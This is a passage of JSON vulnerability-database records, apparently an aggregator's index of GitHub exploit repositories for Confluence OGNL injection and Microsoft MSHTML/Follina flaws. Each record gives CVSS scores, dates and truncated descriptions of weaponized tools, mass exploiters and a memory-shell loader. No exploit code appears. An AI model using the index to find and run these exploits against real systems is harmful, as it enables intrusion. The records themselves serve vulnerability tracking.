"NONE"}, "impactScore": 5.9}, "published": "2021-08-31T16:33:32", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-13T21:41:32", "id": "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:32", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-28T06:33:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-28T09:38:18", "id": "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-11T11:54:27", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "F5B504D7-7C37-5BAB-94A5-1F1DA8384055", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:38:38", "description": "# CVE-2021-26084\nConfluence aut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T11:01:49", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T04:53:46", "id": "EF37F62F-1579-535A-9C3E-49B080F41CAC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:06:08", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-16T21:47:10", "id": "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:45:32", "description": "# CVE-2021-26084\n# confluence\u8fdc\u7a0b\u4ee3\u7801\u6267\u884cRCE\n\n## Code By:Jun_sheng @\u6a58\u5b50...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T03:07:28", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-02T13:22:29", "id": "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-06T07:52:51", "description": "# ConfluCHECK\nPython 3 script to identify CVE-2021-26084 via net...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-23T19:45:31", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-24T19:02:52", "id": "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-05T05:19:33", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-05T02:27:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-06-05T02:29:52", "id": "1934A15D-9857-5560-B6CA-EA6A2A8A91F8", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-09T21:51:56", "description": "# Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T08:32:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-09T21:16:38", "id": "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:05:08", "description": "# cve-2022-21882-poc\nlpe poc...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-07T03:45:36", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882"], "modified": "2023-09-16T21:51:03", "id": "7F49BA75-ECD5-5933-8F39-585255092893", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-11T23:41:37", "description": "# CVE-2022-30190\n\n> Based on https://github.com/JohnHammond/msdt...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-02T07:56:28", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:29", "id": "CEC4033D-26C5-5A07-8D86-31A7AF928BDB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:59:41", "description": "# **_\ud83e\ude79CVE-2022-30190 Temporary Fix\ud83e\ude79 (Source Code)_**\nThese are t...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-12T11:48:22", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T10:20:20", "id": "4881AA63-B127-594A-8F5B-ED68FD4BB9FF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:06:38", "description": "# CVE-2022-26134 PoC\n\nConfluence Server and Data Center - CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T10:44:38", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-03-10T12:12:43", "id": "423DF4D5-60AF-5663-B196-2A67DD13D226", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:41:08", "description": "# ConfluentPwn\nConfluence pre-auth ONGL injection remote code ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T04:53:31", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-09-16T21:54:13", "id": "83B145E2-F995-5B1C-863E-164839ED1173", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:55:45", "description": "# POC - Atlassian Confluence OGNL Injection Remote Code Executio...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-24T10:33:13", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-27T22:50:35", "id": "20BFC1D4-CB1E-51CF-82D8-E4258142BB69", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-23T20:11:29", "description": "# 0DAYEXPLOITAtlassianConfluenceCVE-2022-26134\n\nCVE-2022-26134 -...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T19:59:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-23T17:24:50", "id": "66468422-89C0-5AC8-9CEA-6B512338FF7C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-30T07:31:59", "description": "# CVE-2022-30190 (Follina)\n\n[![build.yml](https://github.com/win...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-15T16:12:57", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-08-29T16:29:42", "id": "7FAB36AD-345E-5C1B-B259-20BF0E7DE97A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:41:30", "description": "# CVE-2022-26134\nConfluence OGNL expression injected RCE(CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T11:16:28", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-09-16T21:54:06", "id": "EA88FA45-8CE7-5D7D-8E6C-B04F8392F7EB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-02T22:59:27", "description": "# CVE-2022-30190-mass-rce\nCVE-2022-30190 Zero click rce Mass Exp...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T17:28:27", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-02T17:31:11", "id": "75389328-1B05-5056-B8C0-C624BF0343AD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-18T06:32:58", "description": "# CVE-2022-26134-Godzilla-MEMSHELL\n\n## Usage\n```\njava -jar CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T09:19:02", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-09-18T04:39:54", "id": 